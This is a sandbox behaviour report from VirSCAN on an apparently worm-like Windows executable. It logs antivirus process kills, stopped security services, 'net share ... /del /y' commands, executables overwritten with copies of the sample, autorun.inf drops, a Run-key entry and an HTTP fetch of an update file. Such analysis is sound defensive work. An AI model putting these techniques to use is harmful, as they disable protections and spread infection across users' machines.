VirSCAN
File information
Safety rating: 30
Behavior list
Basic Information
MD5: 11633b67e99ae82cbf8a89f9a45e1da4
File type: EXE
Production company:
Version:
Shell or compiler information: COMPILER:Borland Delphi 6.0 - 7.0
Key behavior
Behavior description: Modifies existing system EXE files
details:C:\222c25ed\IE8-Setup-Full\installservices.exe
C:\install.exe
C:\Program Files\Adobe\Reader 9.0\Reader\A3DUtility.exe
C:\Program Files\Adobe\Reader 9.0\Reader\AcroBroker.exe
C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.exe
C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32Info.exe
C:\Program Files\Adobe\Reader 9.0\Reader\AcroTextExtractor.exe
C:\Program Files\Adobe\Reader 9.0\Reader\AdobeCollabSync.exe
C:\Program Files\Adobe\Reader 9.0\Reader\Eula.exe
C:\Program Files\Adobe\Reader 9.0\Reader\LogTransport2.exe
C:\Program Files\Adobe\Reader 9.0\Reader\PDFPrevHndlrShim.exe
C:\Program Files\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe
C:\Program Files\e\e.exe
C:\Program Files\e\sdk\cpp\tools\guidgen.exe
Behavior description: Retrieves TickCount value
details:TickCount = 216094, SleepMilliseconds = 1.
TickCount = 216110, SleepMilliseconds = 1.
TickCount = 217094, SleepMilliseconds = 1.
TickCount = 218066, SleepMilliseconds = 20.
TickCount = 219066, SleepMilliseconds = 20.
TickCount = 220066, SleepMilliseconds = 20.
TickCount = 221066, SleepMilliseconds = 20.
TickCount = 222110, SleepMilliseconds = 1.
TickCount = 222145, SleepMilliseconds = 20.
TickCount = 222254, SleepMilliseconds = 20.
TickCount = 222270, SleepMilliseconds = 20.
TickCount = 222285, SleepMilliseconds = 20.
TickCount = 222301, SleepMilliseconds = 20.
TickCount = 222316, SleepMilliseconds = 20.
TickCount = 222332, SleepMilliseconds = 20.
Behavior description: Kills processes
details:C:\WINDOWS\system32\Mcshield.exe
C:\WINDOWS\system32\VsTskMgr.exe
C:\WINDOWS\system32\naPrdMgr.exe
C:\WINDOWS\system32\UpdaterUI.exe
C:\WINDOWS\system32\TBMon.exe
C:\WINDOWS\system32\scan32.exe
C:\WINDOWS\system32\Ravmond.exe
C:\WINDOWS\system32\CCenter.exe
C:\WINDOWS\system32\RavTask.exe
C:\WINDOWS\system32\Rav.exe
C:\WINDOWS\system32\RavMon.exe
C:\WINDOWS\system32\taskmgr.exe
Behavior description: Sets special file attributes
details:C:\DiskX\setup.exe
C:\DiskD\setup.exe
C:\setup.exe
Behavior description: Creates autorun file in root directory
details:C:\DiskX\autorun.inf
C:\DiskD\autorun.inf
C:\autorun.inf
Behavior description: Sets special folder attributes
details:C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5
C:\Documents and Settings\Administrator\Local Settings\History
C:\Documents and Settings\Administrator\Local Settings\History\History.IE5
C:\Documents and Settings\Administrator\Cookies
C:\Documents and Settings\Administrator\IETldCache
Behavior description: Modifies registry (startup items)
details:\REGISTRY\USER\S-*\Software\Microsoft\Windows\CurrentVersion\Run\svcshare
Process behavior
Behavior description: Creates process with hidden window
details:ImagePath = , CmdLine = cmd.exe /c net share X$ /del /y
ImagePath = , CmdLine = C:\WINDOWS\?劺??吟祊媇魨?湱Q??$?伊?崒5橅鐲?崪溚?Q崒5??$????Q崒5橏?$??E鴭E鴥E?;E衦棆u鄫?3吟祊Ph豦垕?騮;??塇(±n?魞塇∧n?纍兝x堿p±n婬p伭锰烫烫烫烫烫烫烫?U嬱侅WVS3婦$ 纝G婽$髫髭冐?Moders!P?@? C挵x??n?d瓸A穒N硶83浌憖致夤麜AH璯+g读黖_ twere0464e3 EventTrace
ImagePath = , CmdLine = C:\WINDOWS\#type Header 0
ImagePath = , CmdLine = C:\WINDOWS\{
ImagePath = , CmdLine = C:\WINDOWS\ BufferSize, ItemULong
ImagePath = , CmdLine = C:\WINDOWS\ Version, ItemULong
ImagePath = , CmdLine = C:\WINDOWS\ BuildNumber, ItemULong
ImagePath = , CmdLine = C:\WINDOWS\ NumProc, ItemULong
ImagePath = , CmdLine = C:\WINDOWS\ EndTime, ItemULongLong
ImagePath = , CmdLine = C:\WINDOWS\ TimerResolution,ItemULong
ImagePath = , CmdLine = C:\WINDOWS\ MaxFileSize, ItemULong
ImagePath = , CmdLine = C:\WINDOWS\ LogFileMode, ItemULongX
ImagePath = , CmdLine = C:\WINDOWS\ BuffersWritten, ItemULong
ImagePath = , CmdLine = C:\WINDOWS\ StartBuffers, ItemULong
ImagePath = , CmdLine = C:\WINDOWS\ PointerSize, ItemULong
Behavior description: Creates process
details:[0x00000cc0]ImagePath = C:\WINDOWS\system32\cmd.exe, CmdLine = cmd.exe /c net share X$ /del /y
[0x00000ccc]ImagePath = C:\WINDOWS\system32\cmd.exe, CmdLine = cmd.exe /c net share D$ /del /y
[0x00000cdc]ImagePath = C:\WINDOWS\system32\cmd.exe, CmdLine = cmd.exe /c net share C$ /del /y
[0x00000ce4]ImagePath = C:\WINDOWS\system32\cmd.exe, CmdLine = cmd.exe /c net share admin$ /del /y
[0x00000cf4]ImagePath = C:\WINDOWS\system32\net.exe, CmdLine = net share X$ /del /y
[0x00000d00]ImagePath = C:\WINDOWS\system32\net1.exe, CmdLine = net1 share X$ /del /y
[0x00000d30]ImagePath = C:\WINDOWS\system32\net.exe, CmdLine = net share C$ /del /y
[0x00000d38]ImagePath = C:\WINDOWS\system32\net.exe, CmdLine = net share D$ /del /y
[0x00000d44]ImagePath = C:\WINDOWS\system32\net1.exe, CmdLine = net1 share C$ /del /y
[0x00000d4c]ImagePath = C:\WINDOWS\system32\net.exe, CmdLine = net share admin$ /del /y
[0x00000d58]ImagePath = C:\WINDOWS\system32\net1.exe, CmdLine = net1 share D$ /del /y
[0x00000d64]ImagePath = C:\WINDOWS\system32\net1.exe, CmdLine = net1 share admin$ /del /y
Behavior description: Creates process from newly created file
details:[0x00000a58]ImagePath = C:\WINDOWS\system32\drivers\spo0lsv.exe, CmdLine = C:\WINDOWS\system32\drivers\spo0lsv.exe
Behavior description: Enumerates processes
details:N/A
Behavior description: Kills processes
details:C:\WINDOWS\system32\Mcshield.exe
C:\WINDOWS\system32\VsTskMgr.exe
C:\WINDOWS\system32\naPrdMgr.exe
C:\WINDOWS\system32\UpdaterUI.exe
C:\WINDOWS\system32\TBMon.exe
C:\WINDOWS\system32\scan32.exe
C:\WINDOWS\system32\Ravmond.exe
C:\WINDOWS\system32\CCenter.exe
C:\WINDOWS\system32\RavTask.exe
C:\WINDOWS\system32\Rav.exe
C:\WINDOWS\system32\RavMon.exe
C:\WINDOWS\system32\taskmgr.exe
Behavior description: Creates local thread
details:TargetProcess: %temp%\****.exe, InheritedFromPID = 2000, ProcessID = 2492, ThreadID = 2528, StartAddress = 77DC845A, Parameter = 00000000
TargetProcess: spo0lsv.exe, InheritedFromPID = 2492, ProcessID = 2648, ThreadID = 2656, StartAddress = 77DC845A, Parameter = 00000000
TargetProcess: spo0lsv.exe, InheritedFromPID = 2492, ProcessID = 2648, ThreadID = 2660, StartAddress = 0040A48C, Parameter = 00000000
TargetProcess: spo0lsv.exe, InheritedFromPID = 2492, ProcessID = 2648, ThreadID = 2664, StartAddress = 00403BC8, Parameter = 00CC01C8
TargetProcess: spo0lsv.exe, InheritedFromPID = 2492, ProcessID = 2648, ThreadID = 2668, StartAddress = 00403BC8, Parameter = 00CC01D4
TargetProcess: spo0lsv.exe, InheritedFromPID = 2492, ProcessID = 2648, ThreadID = 2672, StartAddress = 00403BC8, Parameter = 00CC01E0
TargetProcess: spo0lsv.exe, InheritedFromPID = 2492, ProcessID = 2648, ThreadID = 2676, StartAddress = 00403BC8, Parameter = 00CC01C8
TargetProcess: spo0lsv.exe, InheritedFromPID = 2492, ProcessID = 2648, ThreadID = 2680, StartAddress = 00403BC8, Parameter = 00CC0270
TargetProcess: spo0lsv.exe, InheritedFromPID = 2492, ProcessID = 2648, ThreadID = 2684, StartAddress = 00403BC8, Parameter = 00CC027C
TargetProcess: spo0lsv.exe, InheritedFromPID = 2492, ProcessID = 2648, ThreadID = 2688, StartAddress = 00403BC8, Parameter = 00CC0288
TargetProcess: spo0lsv.exe, InheritedFromPID = 2492, ProcessID = 2648, ThreadID = 2692, StartAddress = 00403BC8, Parameter = 00CC0294
TargetProcess: spo0lsv.exe, InheritedFromPID = 2492, ProcessID = 2648, ThreadID = 2696, StartAddress = 00403BC8, Parameter = 00CC02A0
TargetProcess: spo0lsv.exe, InheritedFromPID = 2492, ProcessID = 2648, ThreadID = 2700, StartAddress = 00403BC8, Parameter = 00CC02AC
TargetProcess: spo0lsv.exe, InheritedFromPID = 2492, ProcessID = 2648, ThreadID = 2716, StartAddress = 004061B8, Parameter = 00000000
TargetProcess: spo0lsv.exe, InheritedFromPID = 2492, ProcessID = 2648, ThreadID = 2748, StartAddress = 004061B8, Parameter = 00000000
File behavior
Behavior description: Creates file
details:C:\WINDOWS\system32\drivers\spo0lsv.exe
C:\222c25ed\Desktop_.ini
C:\222c25ed\IE8-Setup-Full\Desktop_.ini
C:\222c25ed\IE8-Setup-Full\log\Desktop_.ini
C:\DiskD\Desktop_.ini
C:\DiskX\Desktop_.ini
C:\Program Files\Desktop_.ini
C:\Program Files\Adobe\Desktop_.ini
C:\Program Files\Adobe\Reader 9.0\Desktop_.ini
C:\Program Files\Adobe\Reader 9.0\Esl\Desktop_.ini
C:\Program Files\Adobe\Reader 9.0\Reader\Desktop_.ini
C:\DiskX\setup.exe
C:\DiskD\setup.exe
C:\setup.exe
C:\Program Files\Adobe\Reader 9.0\Reader\AIR\Desktop_.ini
Behavior description: Modifies existing system EXE files
details:C:\222c25ed\IE8-Setup-Full\installservices.exe
C:\install.exe
C:\Program Files\Adobe\Reader 9.0\Reader\A3DUtility.exe
C:\Program Files\Adobe\Reader 9.0\Reader\AcroBroker.exe
C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.exe
C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32Info.exe
C:\Program Files\Adobe\Reader 9.0\Reader\AcroTextExtractor.exe
C:\Program Files\Adobe\Reader 9.0\Reader\AdobeCollabSync.exe
C:\Program Files\Adobe\Reader 9.0\Reader\Eula.exe
C:\Program Files\Adobe\Reader 9.0\Reader\LogTransport2.exe
C:\Program Files\Adobe\Reader 9.0\Reader\PDFPrevHndlrShim.exe
C:\Program Files\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe
C:\Program Files\e\e.exe
C:\Program Files\e\sdk\cpp\tools\guidgen.exe
Behavior description: Creates executable file
details:C:\WINDOWS\system32\drivers\spo0lsv.exe
C:\222c25ed\IE8-Setup-Full\installservices.exe
C:\install.exe
C:\Program Files\Adobe\Reader 9.0\Reader\A3DUtility.exe
C:\Program Files\Adobe\Reader 9.0\Reader\AcroBroker.exe
C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.exe
C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32Info.exe
C:\Program Files\Adobe\Reader 9.0\Reader\AcroTextExtractor.exe
C:\Program Files\Adobe\Reader 9.0\Reader\AdobeCollabSync.exe
C:\DiskX\setup.exe
C:\DiskD\setup.exe
C:\setup.exe
C:\Program Files\Adobe\Reader 9.0\Reader\Eula.exe
C:\Program Files\Adobe\Reader 9.0\Reader\LogTransport2.exe
C:\Program Files\Adobe\Reader 9.0\Reader\PDFPrevHndlrShim.exe
Behavior description: Overwrites existing file
details:C:\222c25ed\IE8-Setup-Full\installservices.exe
C:\install.exe
C:\Program Files\Adobe\Reader 9.0\Reader\A3DUtility.exe
C:\Program Files\Adobe\Reader 9.0\Reader\AcroBroker.exe
C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.exe
C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32Info.exe
C:\Program Files\Adobe\Reader 9.0\Reader\AcroTextExtractor.exe
C:\Program Files\Adobe\Reader 9.0\Reader\AdobeCollabSync.exe
C:\Program Files\Adobe\Reader 9.0\Reader\Eula.exe
C:\Program Files\Adobe\Reader 9.0\Reader\LogTransport2.exe
C:\Program Files\Adobe\Reader 9.0\Reader\PDFPrevHndlrShim.exe
C:\Program Files\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe
C:\Program Files\e\e.exe
C:\Program Files\e\sdk\cpp\tools\guidgen.exe
Behavior description: Copies file
details:C:\Documents and Settings\Administrator\Local Settings\%temp%\****.exe ---> C:\WINDOWS\system32\drivers\spo0lsv.exe
C:\WINDOWS\system32\drivers\spo0lsv.exe ---> C:\222c25ed\IE8-Setup-Full\installservices.exe
C:\WINDOWS\system32\drivers\spo0lsv.exe ---> C:\install.exe
C:\WINDOWS\system32\drivers\spo0lsv.exe ---> C:\Program Files\Adobe\Reader 9.0\Reader\A3DUtility.exe
C:\WINDOWS\system32\drivers\spo0lsv.exe ---> C:\Program Files\Adobe\Reader 9.0\Reader\AcroBroker.exe
C:\WINDOWS\system32\drivers\spo0lsv.exe ---> C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.exe
C:\WINDOWS\system32\drivers\spo0lsv.exe ---> C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32Info.exe
C:\WINDOWS\system32\drivers\spo0lsv.exe ---> C:\Program Files\Adobe\Reader 9.0\Reader\AcroTextExtractor.exe
C:\WINDOWS\system32\drivers\spo0lsv.exe ---> C:\Program Files\Adobe\Reader 9.0\Reader\AdobeCollabSync.exe
C:\WINDOWS\system32\drivers\spo0lsv.exe ---> X:\setup.exe
C:\WINDOWS\system32\drivers\spo0lsv.exe ---> D:\setup.exe
C:\WINDOWS\system32\drivers\spo0lsv.exe ---> C:\setup.exe
C:\WINDOWS\system32\drivers\spo0lsv.exe ---> C:\Program Files\Adobe\Reader 9.0\Reader\Eula.exe
C:\WINDOWS\system32\drivers\spo0lsv.exe ---> C:\Program Files\Adobe\Reader 9.0\Reader\LogTransport2.exe
C:\WINDOWS\system32\drivers\spo0lsv.exe ---> C:\Program Files\Adobe\Reader 9.0\Reader\PDFPrevHndlrShim.exe
Behavior description: Sets special file attributes
details:C:\DiskX\setup.exe
C:\DiskD\setup.exe
C:\setup.exe
Behavior description: Searches for file
details:FileName = C:\Documents and Settings\Administrator\Local Settings\%temp%\Desktop_.ini
FileName = C:\WINDOWS
FileName = C:\WINDOWS\system32
FileName = C:\WINDOWS\system32\drivers
FileName = C:\WINDOWS\system32\drivers\spo0lsv.exe
FileName = C:\WINDOWS\system32\drivers\Desktop_.ini
FileName = X:\*.*
FileName = D:\*.*
FileName = C:\*.*
FileName = C:\222c25ed\Desktop_.ini
FileName = C:\222c25ed\*.*
FileName = C:\222c25ed\default.reg
FileName = C:\222c25ed\Desktop_.ini-newfile
FileName = C:\222c25ed\Desktop_.ini-samplefile
FileName = C:\222c25ed\IE8-Setup-Full\Desktop_.ini
Behavior description: Creates autorun file in root directory
details:C:\DiskX\autorun.inf
C:\DiskD\autorun.inf
C:\autorun.inf
Behavior description: Sets special folder attributes
details:C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5
C:\Documents and Settings\Administrator\Local Settings\History
C:\Documents and Settings\Administrator\Local Settings\History\History.IE5
C:\Documents and Settings\Administrator\Cookies
C:\Documents and Settings\Administrator\IETldCache
Behavior description: Modifies file content
details:C:\WINDOWS\system32\drivers\spo0lsv.exe ---> Offset = 0
C:\WINDOWS\system32\drivers\spo0lsv.exe ---> Offset = 65536
C:\222c25ed\Desktop_.ini ---> Offset = 0
C:\222c25ed\IE8-Setup-Full\Desktop_.ini ---> Offset = 0
C:\222c25ed\IE8-Setup-Full\installservices.exe ---> Offset = 0
C:\222c25ed\IE8-Setup-Full\installservices.exe ---> Offset = 65536
C:\222c25ed\IE8-Setup-Full\installservices.exe ---> Offset = 4096
C:\222c25ed\IE8-Setup-Full\installservices.exe ---> Offset = 8192
C:\222c25ed\IE8-Setup-Full\installservices.exe ---> Offset = 12288
C:\222c25ed\IE8-Setup-Full\installservices.exe ---> Offset = 16384
C:\222c25ed\IE8-Setup-Full\installservices.exe ---> Offset = 126976
C:\222c25ed\IE8-Setup-Full\installservices.exe ---> Offset = 127104
C:\222c25ed\IE8-Setup-Full\installservices.exe ---> Offset = 127232
C:\222c25ed\IE8-Setup-Full\installservices.exe ---> Offset = 127360
C:\222c25ed\IE8-Setup-Full\installservices.exe ---> Offset = 127488
Network behavior
Behavior description: Opens URL over the network
details:InternetOpenUrlA: http://ww****om, hInternet = 0x00cc0004, Flags = 0x84000002
InternetOpenUrlA: http://ww****cn/66/up.txt, hInternet = 0x00cc0004, Flags = 0x84000002
Behavior description: Downloads file
details:URLDownloadToFileW: MZ?l趙飋趙焜趙Y捾w9氝w侉遷钾輜鏥踳)嗊w\庍w╩遷0斑wsals %115s +-----------------------------------------------------------------------------------------------------------------------------------+ | Disk Name Reads Kb Writes Kb %62s +-----------------------------------------------------------------------------------------------------------------------------------+ Threads Process Transaction CPU%% %22s | Launched Used KCPU(ms) UCPU(ms) KCPU(ms) UCPU(ms) %28s +-----------------------------------------------------------------------------------------------------------------------------------+ 0-% Exclusive %54s | Name PID Trans Trans/sec KCPU(ms) UCPU(ms) Process CPU%% CPU%% %20s +-----------------------------------------------------------------------------------------------------------------------------------+ ------------------------------------------------------------------+ | +-----------------------------------------------------------------------------------------------------------------------------------+ | Transaction Trans Minimum Maximum Per Transaction Total CPU%% | |
URLDownloadToFileW: #type Header 0 ---> C:\WINDOWS\#type Header 0
URLDownloadToFileW: { ---> C:\WINDOWS\{
URLDownloadToFileW: BufferSize, ItemULong ---> C:\WINDOWS\ BufferSize, ItemULong
URLDownloadToFileW: Version, ItemULong ---> C:\WINDOWS\ Version, ItemULong
URLDownloadToFileW: BuildNumber, ItemULong ---> C:\WINDOWS\ BuildNumber, ItemULong
URLDownloadToFileW: NumProc, ItemULong ---> C:\WINDOWS\ NumProc, ItemULong
URLDownloadToFileW: EndTime, ItemULongLong ---> C:\WINDOWS\ EndTime, ItemULongLong
URLDownloadToFileW: TimerResolution,ItemULong ---> C:\WINDOWS\ TimerResolution,ItemULong
URLDownloadToFileW: MaxFileSize, ItemULong ---> C:\WINDOWS\ MaxFileSize, ItemULong
URLDownloadToFileW: LogFileMode, ItemULongX ---> C:\WINDOWS\ LogFileMode, ItemULongX
URLDownloadToFileW: BuffersWritten, ItemULong ---> C:\WINDOWS\ BuffersWritten, ItemULong
URLDownloadToFileW: StartBuffers, ItemULong ---> C:\WINDOWS\ StartBuffers, ItemULong
URLDownloadToFileW: PointerSize, ItemULong ---> C:\WINDOWS\ PointerSize, ItemULong
URLDownloadToFileW: EventsLost, ItemULong ---> C:\WINDOWS\ EventsLost, ItemULong
Behavior description: Connects to specified site
details:InternetConnectA: ServerName = ww****om, PORT = 80, UserName = , Password = , hSession = 0x00cc0004, hConnect = 0x00cc0008, Flags = 0x84000002
InternetConnectA: ServerName = ww****cn, PORT = 80, UserName = , Password = , hSession = 0x00cc0004, hConnect = 0x00cc0008, Flags = 0x84000002
Behavior description: Opens HTTP connection
details:InternetOpenA: UserAgent: QQ, hSession = 0x00cc0004
Behavior description: Establishes connection to a specified socket
details:URL: ww****om, IP: **.133.40.**:80, SOCKET = 0x00000338
URL: ww****om, IP: **.133.40.**:80, SOCKET = 0x0000033c
URL: ww****cn, IP: **.133.40.**:80, SOCKET = 0x00000370
URL: ww****om, IP: **.133.40.**:80, SOCKET = 0x000003b0
URL: ww****om, IP: **.133.40.**:80, SOCKET = 0x00000400
Behavior description: Reads network file
details:hFile = 0x00cc000c, BytesToRead =1024, BytesRead = 1024.
Behavior description: Sends HTTP packet
details:GET / HTTP/1.1 User-Agent: QQ Host: ww****om Cache-Control: no-cache
GET /66/up.txt HTTP/1.1 User-Agent: QQ Host: ww****cn Cache-Control: no-cache
Behavior description: Opens HTTP request
details:HttpOpenRequestA: ww****cn:80/66/up.txt, hConnect = 0x00cc0008, hRequest = 0x00cc000c, Verb: GET, Referer: , Flags = 0x84000002
Behavior description: Resolves host address by name
details:GetAddrInfoW: ww****om
GetAddrInfoW: ww****cn
Registry behavior
Behavior description: Deletes registry key
details:\REGISTRY\MACHINE\SOFTWARE\Microsoft\PCHealth\ErrorReporting\DW\
Behavior description: Modifies registry
details:\REGISTRY\USER\S-*\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
Behavior description: Modifies registry (folder key attributes)
details:\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue
Behavior description: Deletes registry value
details:\REGISTRY\MACHINE\SOFTWARE\Microsoft\PCHealth\ErrorReporting\DW\DWFileTreeRoot
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RavTask
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KvMonXP
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\kav
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KAVPersonal50
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\McAfeeUpdaterUI
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Network Associates Error Reporting Service
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ShStatEXE
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\YLive.exe
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\yassistse
\REGISTRY\USER\S-*\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer
\REGISTRY\USER\S-*\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyOverride
\REGISTRY\USER\S-*\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoConfigURL
Behavior description: Modifies registry (startup items)
details:\REGISTRY\USER\S-*\Software\Microsoft\Windows\CurrentVersion\Run\svcshare
Other behavior
Behavior description: Creates mutex
details:CTF.LBES.MutexDefaultS-*
CTF.Compart.MutexDefaultS-*
CTF.Asm.MutexDefaultS-*
CTF.Layouts.MutexDefaultS-*
CTF.TMD.MutexDefaultS-*
RasPbFile
Local\ZonesCounterMutex
Local\ZoneAttributeCacheCounterMutex
Local\ZonesCacheCounterMutex
Local\ZonesLockedCacheCounterMutex
Local\c:!documents and settings!administrator!ietldcache!
Behavior description: Creates event object
details:EventName = Global\userenv: User Profile setup event
EventName = DINPUTWINMM
Behavior description: Deletes service
details:[DeleteService] ServiceStartName: LocalSystem, DisplayName: Security Center, BinaryPathName: C:\WINDOWS\System32\svchost.exe -k netsvcs
Behavior description: MD5 of modified executable files
details:C:\222c25ed\IE8-Setup-Full\installservices.exe ---> eba9b7c8983baea5a59261832a8c8c08
C:\install.exe ---> c4a45819403b12091378c6ba7c9767ec
C:\Program Files\Adobe\Reader 9.0\Reader\A3DUtility.exe ---> cdf2707964c0f45d64ce5743e5d938a9
C:\Program Files\Adobe\Reader 9.0\Reader\AcroBroker.exe ---> a80b658bea3fa99b4bd6faddbe8e2181
C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.exe ---> 6be572b3553c4e2d29905d42775a89a4
C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32Info.exe ---> 3770532b43854e7b22f7e2a450911745
C:\Program Files\Adobe\Reader 9.0\Reader\AcroTextExtractor.exe ---> f7710893cdf8684075a9e1cdf4f5ef14
C:\Program Files\Adobe\Reader 9.0\Reader\AdobeCollabSync.exe ---> 86b014bef69a320d61a7209ba42e64bd
C:\Program Files\Adobe\Reader 9.0\Reader\Eula.exe ---> a4331a05edbb2fbffb6bd5d93ae22d25
C:\Program Files\Adobe\Reader 9.0\Reader\LogTransport2.exe ---> 0704575c2c3987628f62c2d8e65813db
C:\Program Files\Adobe\Reader 9.0\Reader\PDFPrevHndlrShim.exe ---> eace363f53a9b1c45a08ba4c9cb1bffa
C:\Program Files\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe ---> 0e5e221d67bca169f298cb85fe8ce2e5
C:\Program Files\e\e.exe ---> 5fac951000c8f884177add92d067d9e3
C:\Program Files\e\sdk\cpp\tools\guidgen.exe ---> 33aa0e44c2141b7d919c04bcc8488e04
Behavior description: Retrieves TickCount value
details:TickCount = 216094, SleepMilliseconds = 1.
TickCount = 216110, SleepMilliseconds = 1.
TickCount = 217094, SleepMilliseconds = 1.
TickCount = 218066, SleepMilliseconds = 20.
TickCount = 219066, SleepMilliseconds = 20.
TickCount = 220066, SleepMilliseconds = 20.
TickCount = 221066, SleepMilliseconds = 20.
TickCount = 222110, SleepMilliseconds = 1.
TickCount = 222145, SleepMilliseconds = 20.
TickCount = 222254, SleepMilliseconds = 20.
TickCount = 222270, SleepMilliseconds = 20.
TickCount = 222285, SleepMilliseconds = 20.
TickCount = 222301, SleepMilliseconds = 20.
TickCount = 222316, SleepMilliseconds = 20.
TickCount = 222332, SleepMilliseconds = 20.
Behavior description: Adjusts process token privileges
details:SE_DEBUG_PRIVILEGE
Behavior description: Opens event
details:HookSwitchHookEnabledEvent
Global\SvcctrlStartEvent_A3752DX
\SECURITY\LSA_AUTHENTICATION_INITIALIZED
\INSTALLATION_SECURITY_HOLD
Behavior description: Signature information of modified executable files
details:C:\222c25ed\IE8-Setup-Full\installservices.exe (signature verification: failed)
C:\install.exe (signature verification: failed)
C:\Program Files\Adobe\Reader 9.0\Reader\A3DUtility.exe (signature verification: failed)
C:\Program Files\Adobe\Reader 9.0\Reader\AcroBroker.exe (signature verification: failed)
C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.exe (signature verification: failed)
C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32Info.exe (signature verification: failed)
C:\Program Files\Adobe\Reader 9.0\Reader\AcroTextExtractor.exe (signature verification: failed)
C:\Program Files\Adobe\Reader 9.0\Reader\AdobeCollabSync.exe (signature verification: failed)
C:\Program Files\Adobe\Reader 9.0\Reader\Eula.exe (signature verification: failed)
C:\Program Files\Adobe\Reader 9.0\Reader\LogTransport2.exe (signature verification: failed)
C:\Program Files\Adobe\Reader 9.0\Reader\PDFPrevHndlrShim.exe (signature verification: failed)
C:\Program Files\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe (signature verification: failed)
C:\Program Files\e\e.exe (signature verification: failed)
C:\Program Files\e\sdk\cpp\tools\guidgen.exe (signature verification: failed)
Behavior description: Executable file signature information
details:C:\WINDOWS\system32\drivers\spo0lsv.exe (signature verification: failed)
C:\222c25ed\IE8-Setup-Full\installservices.exe (signature verification: failed)
C:\install.exe (signature verification: failed)
C:\Program Files\Adobe\Reader 9.0\Reader\A3DUtility.exe (signature verification: failed)
C:\Program Files\Adobe\Reader 9.0\Reader\AcroBroker.exe (signature verification: failed)
C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.exe (signature verification: failed)
C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32Info.exe (signature verification: failed)
C:\Program Files\Adobe\Reader 9.0\Reader\AcroTextExtractor.exe (signature verification: failed)
C:\Program Files\Adobe\Reader 9.0\Reader\AdobeCollabSync.exe (signature verification: failed)
C:\DiskX\setup.exe (signature verification: failed)
C:\DiskD\setup.exe (signature verification: failed)
C:\setup.exe (signature verification: failed)
C:\Program Files\Adobe\Reader 9.0\Reader\Eula.exe (signature verification: failed)
C:\Program Files\Adobe\Reader 9.0\Reader\LogTransport2.exe (signature verification: failed)
C:\Program Files\Adobe\Reader 9.0\Reader\PDFPrevHndlrShim.exe (signature verification: failed)
Behavior description: Calls Sleep function
details:[1]: MilliSeconds = 1.
[1]: MilliSeconds = 20.
[2]: MilliSeconds = 20.
[3]: MilliSeconds = 20.
[4]: MilliSeconds = 20.
[5]: MilliSeconds = 1.
[6]: MilliSeconds = 1.
[7]: MilliSeconds = 20.
[8]: MilliSeconds = 20.
[9]: MilliSeconds = 20.
[10]: MilliSeconds = 20.
Behavior description: Stops system service
details:ServiceName = Task Scheduler
ServiceName = Windows Firewall/Internet Connection Sharing (ICS)
ServiceName = Security Center
Behavior description: Executable file MD5
details:C:\WINDOWS\system32\drivers\spo0lsv.exe ---> 11633b67e99ae82cbf8a89f9a45e1da4
C:\222c25ed\IE8-Setup-Full\installservices.exe ---> 11633b67e99ae82cbf8a89f9a45e1da4
C:\install.exe ---> 11633b67e99ae82cbf8a89f9a45e1da4
C:\Program Files\Adobe\Reader 9.0\Reader\A3DUtility.exe ---> 11633b67e99ae82cbf8a89f9a45e1da4
C:\Program Files\Adobe\Reader 9.0\Reader\AcroBroker.exe ---> 11633b67e99ae82cbf8a89f9a45e1da4
C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.exe ---> 11633b67e99ae82cbf8a89f9a45e1da4
C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32Info.exe ---> 11633b67e99ae82cbf8a89f9a45e1da4
C:\Program Files\Adobe\Reader 9.0\Reader\AcroTextExtractor.exe ---> 11633b67e99ae82cbf8a89f9a45e1da4
C:\Program Files\Adobe\Reader 9.0\Reader\AdobeCollabSync.exe ---> 11633b67e99ae82cbf8a89f9a45e1da4
C:\DiskX\setup.exe ---> 11633b67e99ae82cbf8a89f9a45e1da4
C:\DiskD\setup.exe ---> 11633b67e99ae82cbf8a89f9a45e1da4
C:\setup.exe ---> 11633b67e99ae82cbf8a89f9a45e1da4
C:\Program Files\Adobe\Reader 9.0\Reader\Eula.exe ---> 11633b67e99ae82cbf8a89f9a45e1da4
